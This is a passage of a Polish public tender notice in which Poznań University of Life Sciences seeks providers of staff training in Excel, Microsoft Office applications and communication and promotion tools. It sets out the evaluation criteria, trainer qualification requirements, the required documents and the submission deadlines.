class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji polegające na:<br/>a)	ograniczeniu do 1 (jednej) edycji zaplanowanego szkolenia, w sytuacji zrekrutowania zbyt małej liczby chętnych osób. W takim przypadku Wykonawcy nie będzie przysługiwać roszczenie o zapłatę różnicy między faktycznie zrealizowanymi szkoleniami, a maksymalną wartością brutto zawartej umowy. Rozliczenie nastąpi na podstawie realnego zapotrzebowania Zamawiającego.<br/>b)	Zamawiający dopuszcza w ramach prawa opcji możliwość udzielenia zamówienia dla dodatkowej liczby edycji, większej niż liczba edycji przewidziana w zamówieniu, do 50% wartości umowy, w przypadku konieczności uruchomienia dodatkowej rekrutacji uzupełniającej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena	60%<br/>Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Teams	10%<br/>Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Outlook	10%<br/>Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Power Point	10%<br/>Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Word	10%<br/><br/>Sposób wyliczenia punktów został szczegółowo opisany w rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Teams</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Outlook</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Power Point</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki obsługi programu Ms Word</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III: NARZĘDZIA KOMUNIKACJI I PROMOCJI.<br/><br/>Szkolenie: Zarządzanie obsługą nowoczesnych aplikacji do komunikacji i promocji.<br/><br/>Projekt	Zintegrowany Program Uczelni<br/>Liczba godzin [45’] na edycję	8<br/>Liczba edycji	4<br/>Grupa docelowa	Pracownicy kadry administracyjnej Uniwersytetu Przyrodniczego w Poznaniu<br/>Średnia liczba osób/edycję	Średnia wielkość grupy 12-16 osób<br/>Przewidywana liczba osób	56<br/>Formuła	Stacjonarna/zdalna*<br/>Łączna liczba godzin	32<br/>Termin realizacji zamówienia	do 30.11.2023<br/>*co do zasady szkolenia są stacjonarne, w uzasadnionych przypadkach Zamawiający może zlecić realizację szkolenia w formie zdalnej.<br/><br/>Zakres tematyki szkolenia:<br/>a)	wprowadzenie teoretyczne,<br/>b)	podstawy PR, <br/>c)	Content Marketing<br/>d)	metody i zalety wykorzystywania social media w promocji instytucji szkolnictwa wyższego,<br/>e)	podstawowe platformy i narzędzia komunikacji,<br/>f)	sposoby konstruowania komunikatów i dystrybucji informacji,<br/>g)	dostosowanie rodzaju komunikatu do grupy odbiorców,<br/>h)	tworzenie grafik i przekazu informacji w sieci,<br/>i)	nawiązywanie relacji z odbiorcą<br/>j)	przykłady udanych kampanii social media, najczęściej popełniane błędy.<br/><br/>Metody dydaktyczne: prezentacja ćwiczenia, dyskusja warsztat<br/>Forma zajęć: interaktywna i warsztatowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji polegające na:<br/>a)	ograniczeniu do 1 (jednej) edycji zaplanowanego szkolenia, w sytuacji zrekrutowania zbyt małej liczby chętnych osób. W takim przypadku Wykonawcy nie będzie przysługiwać roszczenie o zapłatę różnicy między faktycznie zrealizowanymi szkoleniami, a maksymalną wartością brutto zawartej umowy. Rozliczenie nastąpi na podstawie realnego zapotrzebowania Zamawiającego.<br/>b)	Zamawiający dopuszcza w ramach prawa opcji możliwość udzielenia zamówienia dla dodatkowej liczby edycji, większej niż liczba edycji przewidziana w zamówieniu, do 50% wartości umowy, w przypadku konieczności uruchomienia dodatkowej rekrutacji uzupełniającej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena	60%<br/>2.	Doświadczenie Trenera	40%<br/><br/>Kryterium nr 1 – Cena 60%<br/>Maksymalna liczba punktów możliwa do uzyskania w kryterium cena to 60 punktów.<br/>Punkty dla złożonych ofert zostaną wyliczone według wzoru:<br/><br/>całkowita wartość brutto oferty najniższej<br/>---------------------------------------------------------------- x 60 = M<br/>całkowita wartość brutto oferty badanej<br/><br/>M – liczba punktów uzyskana przez ofertę w kryterium cena<br/>UWAGA! Całkowita wartość brutto oferty oznacza cenę zaoferowaną przez Wykonawcę <br/>w formularzu ofertowym za przeprowadzenie wszystkich edycji szkolenia.<br/><br/>Kryterium nr 2 - Doświadczenie Trenera – 40%<br/>Maksymalna liczba punktów możliwa do uzyskania w tym kryterium to 40 punktów.<br/>Łączna wartość punktów uzależniona jest od dodatkowego doświadczenia trenera wyznaczonego do realizacji danego zamówienia w przeprowadzeniu szkoleń dla osób dorosłych z tematyki opisanej w rozdziale III ppkt 3.3.1 SWZ oraz dodatkowego doświadczenie Trenera w prowadzeniu szkoleń z tematyki szkolenia dla pracowników Uczelni Wyższych.<br/>Dodatkowe doświadczenie trenera wyznaczonego do realizacji danego zamówienia w przeprowadzeniu szkoleń dla osób dorosłych z tematyki opisanej w rozdziale III ppkt. 3.3.1 SWZ.<br/>Uwaga: Przez dodatkowe doświadczenia trenera należy rozumieć doświadczenie inne niż 32h doświadczenia wykazywanego na potwierdzenie spełniania warunku udziału w postępowaniu. <br/>Punkty zostaną przyznane w następujący sposób:<br/>Liczba godzin przeprowadzonych szkoleń w ciągu ostatnich 3 lat z zakresu tematyki opisanej w rozdziale III ppkt. 3.3.1 SWZ.	<br/>Liczba punktów możliwa do uzyskania<br/>1h - 32h	1<br/>33h - 49h	8<br/>50h - 66h	16<br/>67h - 83h	24<br/>≥ niż 84h	32<br/>Ocenie będzie podlegał jeden trener, wskazany przez Wykonawcę na warunek udziału w postępowaniu. <br/><br/>Dodatkowe doświadczenie Trenera w prowadzeniu szkoleń z tematyki szkolenia dla pracowników Uczelni Wyższych. <br/>Uwaga: Przez dodatkowe doświadczenia trenera należy rozumieć doświadczenie inne niż 32h doświadczenia wykazywanego na potwierdzenie spełniania warunku udziału w postępowaniu oraz inne niż doświadczenie trenera wyznaczonego do realizacji danego zamówienia <br/>w przeprowadzeniu szkoleń dla osób dorosłych z tematyki opisanej w rozdziale III ppkt. 3.3.1 SWZ – wykazane w powyższej tabeli. <br/>Punkty zostaną przyznane w nastepujący sposób:<br/>Liczba godzin przeprowadzonych szkoleń w ciągu ostatnich 3 lat z zakresu tematyki opisanej w rozdziale III ppkt. 3.3.1 SWZ dla pracowników Uczelni Wyższych	Liczba punktów<br/>możliwa do uzyskania<br/>1h - 16h	1<br/>17h - 25h	2<br/>26h - 34h	4<br/>35h - 43h	6<br/>≥ niż 44h	8<br/><br/>Ocenie będzie podlegał jeden trener, wskazany przez Wykonawcę na warunek udziału w postępowaniu, jeśli będzie miał doświadczenie w prowadzeniu szkoleń z tematyki szkolenia dla pracowników Uczelni Wyższych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące Zdolności technicznej lub zawodowej:<br/><br/><br/>DLA CZĘŚCI I: KURS EXCEL – POZIOM PODSTAWOWY<br/>a)	Wykonane usługi:<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje (dotyczy świadczeń okresowych lub ciągłych) minimum 4 szkolenia o tematyce tożsamej ze szkoleniem, będącym przedmiotem zamówienia w łącznym wymiarze minimum 48h szkoleniowych, zrealizowanych na podstawie jednej lub kilku umów o łącznej wartości nie mniejszej niż 6.000,00 zł brutto.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby powyższy warunek spełniał przynajmniej jeden z Wykonawców w całości.<br/><br/>b)	Dysponowanie osobami i wymagania wobec trenerów:<br/>Wykonawca spełni warunek, jeżeli będzie dysponował minimum 1 osobą, skierowaną do realizacji przedmiotu zamówienia w szczególności odpowiedzialną za świadczenie usług, która posiada:<br/>•	wykształcenie wyższe magisterskie,<br/>•	minimum 2 letnie doświadczenie zawodowe jako trener,<br/>•	doświadczenie w prowadzeniu szkoleń dla osób dorosłych w wymiarze minimum 96h <br/>w ciągu ostatnich 3 lat, z tematyki szkolenia opisanego w rozdziale III ust. 3 pkt. 3.1<br/><br/><br/>DLA CZĘŚCI II: MS OFFICE <br/>a)	Wykonane usługi:<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje (dotyczy świadczeń okresowych lub ciągłych) minimum 5 szkoleń z tematyki obsługi programów Ms Teams, Ms Outlook, Ms Power Point oraz Ms Word <br/>w łącznym wymiarze minimum 60h szkoleniowych zrealizowanych na podstawie jednej lub kilku umów o łącznej wartości nie mniejszej niż 8.000,00 zł brutto.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby powyższy warunek spełniał przynajmniej jeden z Wykonawców w całości.<br/><br/>b)	Dysponowanie osobami i wymagania wobec trenerów:<br/>Wykonawca spełni warunek, jeżeli będzie dysponował minimum 1 osobą skierowaną do realizacji przedmiotu zamówienia, która posiada doświadczenie w prowadzeniu szkoleń <br/>w niżej wymienionych modułach tematycznych.<br/>Na Wykonawcy spoczywa obowiązek wykazania takiej ilości osób, aby zapewnić osobę do poprowadzenia szkolenia w każdym z modułów. <br/>•	Moduł „Ms Teams”<br/>a)	wykształcenie wyższe magisterskie,<br/>b)	minimum 2 letnie doświadczenie zawodowe jako trener,<br/>c)	doświadczenie w prowadzeniu szkoleń z tematyki obsługi programu Ms Teams dla osób dorosłych, w wymiarze minimum 16h w ciągu ostatnich 3 lat<br/><br/>• Moduł „Ms Outlook”<br/>a)	wykształcenie wyższe magisterskie,<br/>b)	minimum 2 letnie doświadczenie zawodowe jako trener,<br/>c)	doświadczenie w prowadzeniu szkoleń z tematyki obsługi programu Ms Outlook dla osób dorosłych, w wymiarze minimum 16h w ciągu ostatnich 3 lat<br/><br/>• Moduł „Ms Power Point”<br/>a)	wykształcenie wyższe magisterskie,<br/>b)	minimum 2 letnie doświadczenie zawodowe jako trener,<br/>c)	doświadczenie w prowadzeniu szkoleń z tematyki obsługi programu Ms Power Point dla osób dorosłych, w wymiarze minimum 32h w ciągu ostatnich 3 lat<br/><br/>•	Moduł „Ms Word”<br/>a)	wykształcenie wyższe magisterskie,<br/>b)	minimum 2 letnie doświadczenie zawodowe jako trener,<br/>c)	doświadczenie w prowadzeniu szkoleń z tematyki obsługi programu Ms Word dla osób dorosłych, w wymiarze minimum 32h w ciągu ostatnich 3 lat<br/><br/><br/>DLA CZĘŚCI III: NARZĘDZIA KOMUNIKACJI I PROMOCJI <br/>a)	Wykonane usługi:<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje (dotyczy świadczeń okresowych lub ciągłych) minimum 2 szkolenia o tematyce tożsamej z planowanym szkoleniem, w łącznym wymiarze minimum 24h, zrealizowanych na podstawie jednej lub kilku umów o łącznej wartości nie mniejszej niż 3.000,00 zł brutto.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby powyższy warunek spełniał przynajmniej jeden z Wykonawców w całości.<br/><br/><br/><br/>b)	Dysponowanie osobami i wymagania wobec trenerów:<br/>Wykonawca spełni warunek, jeżeli będzie dysponował minimum 1 osobą, skierowaną do realizacji przedmiotu zamówienia, w szczególności odpowiedzialną za świadczenie usług, która posiada:<br/>•	wykształcenie wyższe magisterskie,<br/>•	minimum 2 letnie doświadczenie zawodowe jako trener,<br/>•	doświadczenie w prowadzeniu szkoleń dla osób dorosłych z tematyki szkolenia opisanego<br/>w rozdziale III ust. 3 pkt. 3.3. SWZ, w wymiarze minimum 32h w ciągu ostatnich 3 lat.<br/><br/>W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku określonego dla każdej z części w pkt 1 ppkt 1.4, lit. a), Zamawiający, jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do których realizacji uprawnienia te są wymagane.<br/>Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U 2022, poz. 1710 ze zm.), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wzór oświadczenia stanowi załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane w celu potwierdzenia spełnienia warunku udziału w postępowaniu, który został wskazany (dla każdej z części zamówienia) w rozdziale XV SWZ.<br/>Zamawiający wymaga, aby powyższy wykaz został sporządzony według załącznika do SWZ - Wykaz zrealizowanych szkoleń:<br/>nr 3a – dla części I <br/>nr 3b – dla części II <br/>nr 3c – dla części III <br/><br/>Dowody potwierdzające należyte wykonanie usług, wykazanych w załączniku nr 3 (a,b,c) do SWZ.<br/>(dowody określające, czy usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wypełniony formularz ofertowy – wg załącznika nr:<br/>1a do SWZ – dla części I <br/>1b do SWZ – dla części II <br/>1c do SWZ – dla części III <br/><br/>Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w formularzu oferty dane umożliwiające dostęp do tych dokumentów.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania.<br/><br/>Jeżeli dotyczy:<br/>a)	Pełnomocnictwo upoważniające do złożenia oferty (umocowanie do reprezentowania wykonawcy) - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów określających status prawny wykonawcy.<br/>b)	Pełnomocnictwo dla osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>c)	Pełnomocnictwo dla osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach.<br/><br/>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu – wzór oświadczenia stanowi załącznik nr 7 do SWZ.<br/>Dokument składa się w formie elektronicznej (tj. z kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>UWAGA:<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie (zgodnie z zał. nr 7 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie (zgodnie z zał. nr 7 do SWZ) podmiotu udostępniającego zasoby, potwierdzające spełnienie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/><br/><br/>Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania wzór oświadczenia stanowi załącznik nr 6 do SWZ. <br/>UWAGA:<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie (zgodnie z zał. nr 6 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie (zgodnie z zał. nr 6 do SWZ str. 2) podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu.<br/><br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia składane na podstawie art. 118 ustawy Prawo zamówień publicznych - załącznik nr 4 do SWZ <br/><br/>Oświadczenie (art. 117 ust. 4) – wzór oświadczenia stanowi załącznik nr 8 do SWZ (jeżeli dotyczy).<br/><br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający wymaga, aby powyższy wykaz został sporządzony według załącznika do SWZ - Wykaz osób (skierowanych do realizacji zamówienia) potwierdzający spełnienie warunków udziału w postępowaniu:<br/>nr 2a do SWZ – cz. I<br/>nr 2b do SWZ – cz. II <br/>nr 2c do SWZ – cz. III <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia.<br/>2.	Wykonawcy muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Wypełniając formularz oferty, jak również inne dokumenty powołujące się na „wykonawcę”; w miejscu „np. nazwa i adres wykonawcy” należy wpisać dane wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z Pełnomocnikiem wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako Pełnomocnik.<br/>5.	Przed podpisaniem umowy (w przypadku wyboru oferty), wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej ich współpracę.<br/>6.	Sposób składania dokumentów w ofercie wspólnej: <br/>- oferta musi być podpisana w taki sposób, by poprawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7.	W odniesieniu do wymagań postawionych przez zamawiającego każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia oddzielnie musi udokumentować, że nie podlega wykluczeniu - każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego składa oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w zakresie terminu realizacji zamówienia lub innych terminów umownych, jeżeli konieczność ich wydłużenia jest wynikiem okoliczności niezależnych od Wykonawcy i należycie udokumentowanych przez Stronę, która wnosi o dokonanie zmiany Umowy (w tym także w przypadku wydłużenia okresu trwania Projektu).<br/>3.	Okres przesunięcia terminu realizacji umowy lub innego terminu umownego, w przypadku wystąpienia okoliczności, o których mowa w ust. 2 równy będzie okresowi przerwy lub wydłużenia spowodowanego ich wystąpieniem. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://up-poznan.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokładna nazwa zamówienia:<br/>Usługa przeprowadzenia szkoleń z zakresu obsługi wybranych programów Microsoft 365 oraz narzędzi do komunikacji i promocji zgodnie z zakresem merytorycznym projektów pt. „Najlepsi z natury! Zintegrowany Program Rozwoju Uniwersytetu Przyrodniczego w Poznaniu” oraz „Najlepsi z natury 2.0. Zintegrowany Program Uniwersytetu Przyrodniczego w Poznaniu” - liczba części 3.<br/><br/><br/>Przedmiotem zamówienia jest świadczenie usługi przeprowadzenia szkolenia z zakresu podnoszenia kompetencji kadry administracyjnej i zarządczej zgodnie z zakresem merytorycznym projektu pt. „Najlepsi z natury! Zintegrowany Program Rozwoju Uniwersytetu Przyrodniczego w Poznaniu” zwanym dalej Zintegrowanym Programem Uczelni oraz „Najlepsi <br/>z natury 2.0. Zintegrowany Program Uniwersytetu Przyrodniczego w Poznaniu” zwanym dalej Zintegrowanym Programem Uczelni 2.0.<br/><br/><br/>Zamawiający realizuje program Osi III Szkolnictwo wyższe dla gospodarki i rozwoju Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 pt. „Najlepsi z natury! 